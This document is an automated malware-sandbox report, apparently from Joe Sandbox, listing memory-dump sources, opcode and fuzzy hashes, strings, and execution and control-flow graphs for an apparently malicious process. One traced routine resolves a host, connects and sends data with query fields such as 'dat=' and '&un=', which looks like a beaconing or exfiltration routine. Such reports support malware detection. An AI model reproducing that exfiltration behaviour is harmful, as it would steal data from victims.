                                                                              • API String ID: 0-871070163
                                                                              • Opcode ID: 0a54c6ad385fbb2500995866d5443acc1ce3a0eaf07988fbb9dec4d884c51928
                                                                              • Instruction ID: 954e601bb8b25d32c1a2af17bc1519c2a1d947c49876b3b90545eb8864749be0
                                                                              • Opcode Fuzzy Hash: 0a54c6ad385fbb2500995866d5443acc1ce3a0eaf07988fbb9dec4d884c51928
                                                                              • Instruction Fuzzy Hash: 984100313097028FD712DE25C940F5AB7E5EF89320F401A2DE95AEB291DB31E905CB92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2277728C
                                                                              Strings
                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 22777294
                                                                              • RTL: Re-Waiting, xrefs: 227772C1
                                                                              • RTL: Resource at %p, xrefs: 227772A3
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                              • API String ID: 885266447-605551621
                                                                              • Opcode ID: 89ec77f340e661fff60f749a8bed48b1c160e3a562f157ff0dede9ecbf81c9e5
                                                                              • Instruction ID: f4b606df1dbb2e39aa726beed3883989ee2e3a989579cd24d4335bcdbbdad6df
                                                                              • Opcode Fuzzy Hash: 89ec77f340e661fff60f749a8bed48b1c160e3a562f157ff0dede9ecbf81c9e5
                                                                              • Instruction Fuzzy Hash: 0041F232709302ABDB12DE25CD41F9AB7B5FFA4724F100619F964AB241DB30E852C7D6
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID: __aulldvrm
                                                                              • String ID: +$-
                                                                              • API String ID: 1302938615-2137968064
                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                              • Instruction ID: 50bd70d75d7f75686226b5cc0437c7376fb3c1b4abe6e44aac8496b1eb6ad273
                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                              • Instruction Fuzzy Hash: 8991B070E0831A9BDB10CF69C981BEEB7B5EF45724F90471AE954AB2D1EF309941CB20
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $$@
                                                                              • API String ID: 0-1194432280
                                                                              • Opcode ID: c8250a87d326ee0c0a312f012d9e25ae5cc08c6e4660d6361a10fcc4c7436b85
                                                                              • Instruction ID: d2c82c32b5ba9b9645a4eb08241d7a8acc38ac79908c62a8d1b9bb84f216bdad
                                                                              • Opcode Fuzzy Hash: c8250a87d326ee0c0a312f012d9e25ae5cc08c6e4660d6361a10fcc4c7436b85
                                                                              • Instruction Fuzzy Hash: 7B813B71D09369DBDB318B54CD44BEAB7B4AF18754F0041EAEA19B7280D7705E84CFA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Execution Graph

                                                                              Execution Coverage:3.1%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:58.7%
                                                                              Total number of Nodes:46
                                                                              Total number of Limit Nodes:3
                                                                              execution_graph 27334 1143108 27336 1143117 27334->27336 27335 11431cb 27336->27335 27339 1142198 27336->27339 27343 11422b8 27336->27343 27341 11421d8 27339->27341 27340 1142251 27340->27336 27341->27340 27347 11435f8 27341->27347 27344 1142350 27343->27344 27345 11422ce 27343->27345 27344->27336 27346 11435f8 8 API calls 27345->27346 27346->27344 27349 1143639 27347->27349 27348 1143e73 27348->27341 27349->27348 27352 11436d4 27349->27352 27375 1167788 27349->27375 27351 114378d 27351->27348 27355 1143804 27351->27355 27378 1167868 27351->27378 27352->27348 27352->27351 27354 1143769 getaddrinfo 27352->27354 27354->27351 27355->27348 27356 1143b23 27355->27356 27362 11439bc 27355->27362 27357 11678b8 closesocket 27356->27357 27358 1143b3d 27357->27358 27358->27341 27359 1143ab8 27360 11678b8 closesocket 27359->27360 27363 1143ad2 27360->27363 27362->27359 27374 1143b64 27362->27374 27363->27341 27364 1143cd2 27365 11678b8 closesocket 27364->27365 27366 1143d0e 27365->27366 27366->27341 27368 1143c83 27369 1143da2 setsockopt recv 27368->27369 27371 1143cb1 27368->27371 27370 1143e04 27369->27370 27369->27371 27370->27371 27372 1143e0d recv 27370->27372 27384 11678b8 27371->27384 27372->27370 27372->27371 27373 1143c07 27381 1167818 27373->27381 27374->27364 27374->27373 27376 11677a5 27375->27376 27377 11677b4 socket 27376->27377 27377->27352 27379 1167885 27378->27379 27380 1167894 connect 27379->27380 27380->27355 27382 1167832 27381->27382 27383 1167841 send 27382->27383 27383->27368 27385 11678d5 27384->27385 27386 11678e4 closesocket 27385->27386 27386->27348

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 109 11435f8-1143637 110 1143652-1143654 109->110 111 1143639-114363c 109->111 113 1143e98-1143e9d 110->113 114 114365a-1143661 110->114 111->110 112 114363e-1143641 111->112 112->110 115 1143643-1143646 112->115 116 1143e97 114->116 117 1143667-1143675 114->117 115->110 118 1143648-114364b 115->118 116->113 119 1143677-114367a 117->119 120 114367c 117->120 118->110 121 114364d-1143650 118->121 119->120 122 1143682-114368a 119->122 120->122 121->110 121->114 123 114368c-114368f 122->123 124 114369a-114369d 122->124 125 11436a5-11436bc 123->125 126 1143691-1143698 123->126 124->125 127 114369f 124->127 128 11436c3-11436cf call 1167788 125->128 129 11436be-11436c1 125->129 126->127 127->125 132 11436d4-11436f3 128->132 129->128 130 11436f9-1143700 129->130 133 1143706-114370d 130->133 134 114379e-11437ac 130->134 132->116 132->130 136 114370f-1143734 call 113f9d8 call 1160be8 133->136 137 114373a-1143749 133->137 134->116 135 11437b2-11437ba 134->135 138 11437d4-11437df 135->138 139 11437bc-11437cd call 1167748 135->139 136->137 137->116 141 114374f-1143753 137->141 143 11437e1-11437ff call 1167868 138->143 144 114383e-1143853 138->144 139->138 141->116 146 1143759-114375b 141->146 154 1143804-1143824 143->154 150 1143855-114386f call 11690d8 144->150 151 1143871-1143874 144->151 146->116 152 1143761-1143763 146->152 165 11438ad-11438b2 call 11690d8 150->165 151->116 153 114387a-114387d 151->153 152->116 157 1143769-114378b getaddrinfo 152->157 153->116 158 1143883-1143886 153->158 154->144 159 1143826-1143834 154->159 157->134 161 114378d-1143793 157->161 162 114388d-11438ac call 11690d8 158->162 163 1143888-114388b 158->163 159->116 164 114383a 159->164 161->134 162->165 163->162 166 11438b5-1143969 call 11690a8 call 1153c78 call 1153c68 * 2 call 11690a8 call 1153568 call 11692a8 163->166 164->144 165->166 185 1143986-11439ad 166->185 186 114396b-114396e 166->186 188 11439b3-11439b6 185->188 189 1143af9-1143b1d call 1144e88 185->189 186->185 187 1143970-1143983 call 1153a38 186->187 187->185 188->189 192 11439bc-11439df 188->192 198 1143b23-1143b63 call 11678b8 189->198 199 1143a7c-1143a82 189->199 195 11439e5-1143a79 call 11693d8 * 3 call 11692a8 * 2 call 1153c68 * 2 192->195 196 11439e1 192->196 195->199 196->195 201 1143cbd-1143cd0 call 11692a8 199->201 202 1143a88-1143a8b 199->202 213 1143cd2 201->213 214 1143c58-1143c88 call 113f5f8 call 1167818 201->214 202->201 205 1143a91-1143ab2 call 1144ea8 202->205 216 1143b64-1143be1 call 11692a8 call 11690a8 call 11692a8 call 1153568 call 11692a8 * 3 205->216 217 1143ab8-1143af8 call 11678b8 205->217 218 1143cd7-1143cef call 113f5f8 call 1162638 213->218 236 1143c8e-1143ca3 214->236 237 1143d29 214->237 277 1143be3-1143bfa call 11692a8 call 11690a8 216->277 278 1143bfd-1143c01 216->278 234 1143cf4-1143d28 call 11678b8 218->234 236->237 241 1143ca9-1143caf 236->241 242 1143d2c-1143d2f 237->242 241->242 245 1143cb1-1143cb8 241->245 246 1143d31-1143d34 242->246 247 1143d42-1143d5f 242->247 250 1143e59-1143e6e call 11678b8 245->250 246->250 251 1143d3a-1143d3c 246->251 252 1143d71-1143e02 call 11690d8 call 11690a8 setsockopt recv 247->252 253 1143d61-1143d6b 247->253 260 1143e73-1143e96 250->260 251->247 251->250 269 1143e04 252->269 270 1143e45-1143e53 252->270 253->250 253->252 260->116 269->270 271 1143e06-1143e0b 269->271 270->250 271->270 273 1143e0d-1143e43 recv 271->273 273->269 273->270 277->278 280 1143cd4 278->280 281 1143c07-1143c17 278->281 280->218 283 1143c37-1143c3a 281->283 284 1143c19-1143c1f 281->284 287 1143c3f-1143c45 283->287 284->283 286 1143c21-1143c35 284->286 286->287 289 1143c55 287->289 290 1143c47-1143c4d 287->290 289->214 290->289 291 1143c4f 290->291 291->289
                                                                              APIs
                                                                              • getaddrinfo.WS2_32(?,00003038,?,?), ref: 01143787
                                                                                • Part of subcall function 011678B8: closesocket.WS2_32(01143E73,01142350,00000006,?,01143E73,00000C1E,51D04D8D), ref: 011678ED
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310155904.0000000001100000.00000040.80000000.00040000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_1100000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: closesocketgetaddrinfo
                                                                              • String ID: &br=9$&un=$80$dat=
                                                                              • API String ID: 1380972459-3709368510
                                                                              • Opcode ID: 3495d50c3c10d4a0e09db68005f5aebc9377c2266a7f8e7a37d3ef414dfd8557
                                                                              • Instruction ID: 639204ed9420e133055853ec1d7c92aa60018df77407eaee3f1b04d64cbea69b
                                                                              • Opcode Fuzzy Hash: 3495d50c3c10d4a0e09db68005f5aebc9377c2266a7f8e7a37d3ef414dfd8557
                                                                              • Instruction Fuzzy Hash: F942B4B1910306AFDB28CFA8C884FEEB7B9FF58704F14452DE9299B241D731A544CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310155904.0000000001100000.00000040.80000000.00040000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_1100000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e6f79e38685686fcfaaaec6c0d7b7a0c36eee4dc7a3730c9cd3b661e5de77530
                                                                              • Instruction ID: acb7a9d273c0b527d3490efd9aeccf655dce4aff0d02d7dc8c378c650a42c401
                                                                              • Opcode Fuzzy Hash: e6f79e38685686fcfaaaec6c0d7b7a0c36eee4dc7a3730c9cd3b661e5de77530
                                                                              • Instruction Fuzzy Hash: E1E1D0B1D40749BEEB68EBB4CC41FEFB7BCAF64704F00485AF519A6180EB7466448B61
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310155904.0000000001100000.00000040.80000000.00040000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_1100000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: aec00b06992ffcc3f07742df10c723ddaf94acbe429ce628a3f5091f845320d9
                                                                              • Instruction ID: ac46ce9580c4f4699cfd5a1887de434b1612f0f596b0cb1473afcb7d938677a7
                                                                              • Opcode Fuzzy Hash: aec00b06992ffcc3f07742df10c723ddaf94acbe429ce628a3f5091f845320d9
                                                                              • Instruction Fuzzy Hash: FA31A170A01205EFD718CF58D884FEABBB8FF45745F14817DE909AB241C771AA85CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310155904.0000000001100000.00000040.80000000.00040000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_1100000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b96d1a7b90ebf4a6356fc1fb20826d36247b761a55d7cd5f70a0817f6777532d
                                                                              • Instruction ID: 38702346ed3c0b8287260660e991221a7efcf03b0ba5174e3f19692b4827a604
                                                                              • Opcode Fuzzy Hash: b96d1a7b90ebf4a6356fc1fb20826d36247b761a55d7cd5f70a0817f6777532d
                                                                              • Instruction Fuzzy Hash: B531C270A00209EFE718CF58D884FEABBB8FF45705F144179E909AB241C771AA81CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 5683e9f-5684384 1 5684395-56843a1 0->1 2 56843c8-56843ea 1->2 3 56843a3-56843ac 1->3 6 56843fb-5684405 2->6 4 56843ae-56843b2 3->4 5 56843b3-56843b5 3->5 4->5 7 56843c6 5->7 8 56843b7-56843c0 5->8 9 568443b-568443f 6->9 10 5684407-5684417 6->10 7->1 8->7 14 5684460-568446a 9->14 15 5684441-568445e 9->15 12 5684419-5684428 10->12 13 568442a-5684433 10->13 17 5684439 12->17 13->17 16 568447b-5684487 14->16 15->9 18 5684489-5684495 16->18 19 5684497-568449e 16->19 17->6 18->16 22 56844c8-56844d1 19->22 23 56844a0-56844b2 19->23 26 56848aa-56848b3 22->26 27 56844d7-56844e3 22->27 24 56844b9-56844bb 23->24 25 56844b4-56844b8 23->25 28 56844bd-56844c3 24->28 29 56844c6 24->29 25->24 30 56848b9-56848c0 26->30 31 568496a-5684971 26->31 32 5684508-568450f 27->32 33 56844e5-5684506 27->33 28->29 29->19 36 56848ec-56848f6 30->36 37 56848c2-56848ea 30->37 34 56849a3-56849ad 31->34 35 5684973-56849a1 31->35 38 5684511-5684540 32->38 39 5684542-568455b 32->39 33->27 40 56849be-56849c7 34->40 35->31 41 5684907-5684913 36->41 37->30 38->32 39->39 42 568455d-5684567 39->42 44 56849c9-56849d5 40->44 45 56849d7-56849de 40->45 46 5684929-5684930 41->46 47 5684915-5684927 41->47 43 5684578-5684584 42->43 50 568459a-56845b3 43->50 51 5684586-5684598 43->51 44->40 48 5684962 call 569df1f 46->48 49 5684932-5684960 46->49 47->41 57 5684967 48->57 49->46 56 56845c4-56845cd 50->56 51->43 58 56845eb-56845f5 56->58 59 56845cf-56845db 56->59 57->31 62 5684606-568460f 58->62 60 56845e9 59->60 61 56845dd-56845e3 59->61 60->56 61->60 64 5684611-5684620 62->64 65 5684622-5684629 62->65 64->62 67 568465a-5684664 65->67 68 568462b-5684658 65->68 69 5684675-5684681 67->69 68->65 70 5684691-568469b 69->70 71 5684683-568468f 69->71 73 56846ac-56846b8 70->73 71->69 74 56846ba-56846c6 73->74 75 56846d6-56846e8 73->75 76 56846c8-56846ce 74->76 77 56846d4 74->77 78 56846ea-56846f1 75->78 79 56846f6-56846fc 75->79 76->77 77->73 78->26 81 56846ff-5684706 79->81 82 5684708-568473b 81->82 83 568473d-5684747 81->83 82->81 84 5684758-5684764 83->84 85 568477a-5684784 84->85 86 5684766-5684778 84->86 88 5684795-568479e 85->88 86->84 89 56847bc-56847c6 88->89 90 56847a0-56847ac 88->90 93 56847d7-56847e0 89->93 91 56847ba 90->91 92 56847ae-56847b4 90->92 91->88 92->91 95 56847f1-56847f8 93->95 96 56847e2-56847ef 93->96 98 56847fa-568481d 95->98 99 568481f-5684829 95->99 96->93 98->95 100 568483a-5684843 99->100 101 5684859-5684863 100->101 102 5684845-5684857 100->102 104 5684874-568487d 101->104 102->100 105 568487f-5684891 104->105 106 5684893-56848a3 104->106 105->104 106->106 108 56848a5 106->108 108->22
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: "$#$+$-3b$.;$/X$4$6q$:$:$:$>$E$IB$M$O$Of$S$S$S$T$V$\$]$a$g[$q$v$v$|$}$~$~$z$z
                                                                              • API String ID: 0-2832083466
                                                                              • Opcode ID: 4eace24222bf0c86099b94c6568b46891f12b26576a8556d73803acf651ec912
                                                                              • Instruction ID: 9c5e78131505d5bce39a2a8d65d70ac79cebe6de5fe7dfbba984e030a29c57e8
                                                                              • Opcode Fuzzy Hash: 4eace24222bf0c86099b94c6568b46891f12b26576a8556d73803acf651ec912
                                                                              • Instruction Fuzzy Hash: 2E52B2B0D05229CBEF24DF45C8987EDBBB2BB44309F1082D9C0596B291CBB95AC9CF45
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 6$O$S$\$s
                                                                              • API String ID: 0-3854637164
                                                                              • Opcode ID: f5a3e08ee4bd1a692de191ad56edd7ed10d7d6ddf2f396448a19491642c930e6
                                                                              • Instruction ID: 90c91d7b3d1aeaa2911c94a33e540445d8229510dc15a10670b21a448596e421
                                                                              • Opcode Fuzzy Hash: f5a3e08ee4bd1a692de191ad56edd7ed10d7d6ddf2f396448a19491642c930e6
                                                                              • Instruction Fuzzy Hash: 4B41A872E00119BBDF14EB94DD49EEAB3BDEF44310F104599E9099B200E771AA54CFE1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 339 569f1df-569f241 call 5679cef 342 569f26f-569f276 339->342 343 569f243-569f24c call 568a28f 339->343 345 569f251-569f26e call 5679c9f 343->345
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (mlq$(mlq
                                                                              • API String ID: 0-2739804364
                                                                              • Opcode ID: debcb8c11fa742b4056431e890e6e02e785dbb87090db908a2515a1165ca4ef2
                                                                              • Instruction ID: a252193e56541100add469e5b110d9a696020f9b7ebd9d4d2ca88d8d0ca2bed0
                                                                              • Opcode Fuzzy Hash: debcb8c11fa742b4056431e890e6e02e785dbb87090db908a2515a1165ca4ef2
                                                                              • Instruction Fuzzy Hash: C411B9B6D1121CAF8B40DFE9D8419EEBBF8EB48210F54416AE919E7200E7715A04CBA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 348 1167818-116785b call 113fa68 call 1168328 send
                                                                              APIs
                                                                              • send.WS2_32(00000000,00000000,00000006,51D04D8D,51D04D8D,00000006,00000000,00000000,00000006,?), ref: 01167856
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310155904.0000000001100000.00000040.80000000.00040000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_1100000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: send
                                                                              • String ID:
                                                                              • API String ID: 2809346765-0
                                                                              • Opcode ID: 47b1b4ce0c28388353affa56d6a243393a2f11933ebc3e1dae8aebb338115011
                                                                              • Instruction ID: 624c4b90604075c9be422e68a58916dadbbeb16425440b48cacc1ee4f0398e36
                                                                              • Opcode Fuzzy Hash: 47b1b4ce0c28388353affa56d6a243393a2f11933ebc3e1dae8aebb338115011
                                                                              • Instruction Fuzzy Hash: 9AE039B52006097BCA14EE59DC40CEB73ADEFD9311B004409F918A3240D631B962CBF0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 358 1167868-11678aa call 113fa68 call 1168328 connect
                                                                              APIs
                                                                              • connect.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 011678A5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310155904.0000000001100000.00000040.80000000.00040000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_1100000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: connect
                                                                              • String ID:
                                                                              • API String ID: 1959786783-0
                                                                              • Opcode ID: c883adcf03738a8ee619ea94e58904ed556446d43382c840d478b69fd59fae59
                                                                              • Instruction ID: 888bdd1eb4ceb563d8d9d03ca7f8620e0d644d617e332347b6907043275c2a2a
                                                                              • Opcode Fuzzy Hash: c883adcf03738a8ee619ea94e58904ed556446d43382c840d478b69fd59fae59
                                                                              • Instruction Fuzzy Hash: FBE065722443097BDA04EE58DC44DAB37ADEFC9211F004419F908A3240D732BD21CBB1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 353 1167788-11677ca call 113fa68 call 1168328 socket
                                                                              APIs
                                                                              • socket.WS2_32(?,00000006,00000001,00000002,00000001,00000006,?,?,?), ref: 011677C5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310155904.0000000001100000.00000040.80000000.00040000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_1100000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: socket
                                                                              • String ID:
                                                                              • API String ID: 98920635-0
                                                                              • Opcode ID: 8fe5b6f233cc1c44700677cf68b707941aa433a09cf708035f5ab263fb48f33a
                                                                              • Instruction ID: 7e106f94517e2fca3e49810cf93a9d5f315789eb6d698641591b7dd08cf46db2
                                                                              • Opcode Fuzzy Hash: 8fe5b6f233cc1c44700677cf68b707941aa433a09cf708035f5ab263fb48f33a
                                                                              • Instruction Fuzzy Hash: F6E06572244606BFD608EA59EC44DAB33ACEFC9311B004419F908A3200D631B9128BB1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 363 11678b8-11678f2 call 113fa68 call 1168328 closesocket
                                                                              APIs
                                                                              • closesocket.WS2_32(01143E73,01142350,00000006,?,01143E73,00000C1E,51D04D8D), ref: 011678ED
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310155904.0000000001100000.00000040.80000000.00040000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_1100000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: closesocket
                                                                              • String ID:
                                                                              • API String ID: 2781271927-0
                                                                              • Opcode ID: e8dddae60a2998db1edde920ed806a1f0fe9ac36053a4c3026ec65e56826edd3
                                                                              • Instruction ID: 8c73323202d6921565c35f5a3950544946474f7d5ebdf84d8dc038b2f62817fe
                                                                              • Opcode Fuzzy Hash: e8dddae60a2998db1edde920ed806a1f0fe9ac36053a4c3026ec65e56826edd3
                                                                              • Instruction Fuzzy Hash: CFE08C322407047BD610EA69DC00EDBB76DEFC5621F40441AFA08A7241C772B912C7F0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 377 569e44f-569e4b1 call 5679cef 380 569e4e3-569e4ea 377->380 381 569e4b3-569e4c0 call 569a2ff 377->381 383 569e4c5-569e4e2 call 5679c9f 381->383
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0
                                                                              • API String ID: 0-384358150
                                                                              • Opcode ID: a9bcecd11dec4f3c737fb658977c426388fb010a00cf797121fa60b913af71af
                                                                              • Instruction ID: 0dde5d9cdb54487bb471c48d543dcedd0148ce54e83cedd617d8da05fbed5a7f
                                                                              • Opcode Fuzzy Hash: a9bcecd11dec4f3c737fb658977c426388fb010a00cf797121fa60b913af71af
                                                                              • Instruction Fuzzy Hash: 281199B6E0121CAF8B00DFE9D8419EFB7FDEF48210F14466AE919E7200E6715A54CBA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 368 569dfaf-569e011 call 5679cef 371 569e043-569e04a 368->371 372 569e013-569e020 call 569a95f 368->372 374 569e025-569e042 call 5679c9f 372->374
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: |QqJ
                                                                              • API String ID: 0-3456001158
                                                                              • Opcode ID: b1a3a43a07859319a3b198eccdfc8ecb17c155f649c7bdea03b72c2a9b40b093
                                                                              • Instruction ID: d98dfd66017fd73fc5331d4474df80e63eee01bb02a2ef7c11b56c5690ebe60f
                                                                              • Opcode Fuzzy Hash: b1a3a43a07859319a3b198eccdfc8ecb17c155f649c7bdea03b72c2a9b40b093
                                                                              • Instruction Fuzzy Hash: F811DAB2E0121DAF8B00DFA9D9419EEB7FDFF48210F04426AE919E7200E7705A048BA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RV?j
                                                                              • API String ID: 0-609947121
                                                                              • Opcode ID: bd4a7e227afdef288c9bb2abb82389760494954e1bb238a4c5c3bf1d3d803a12
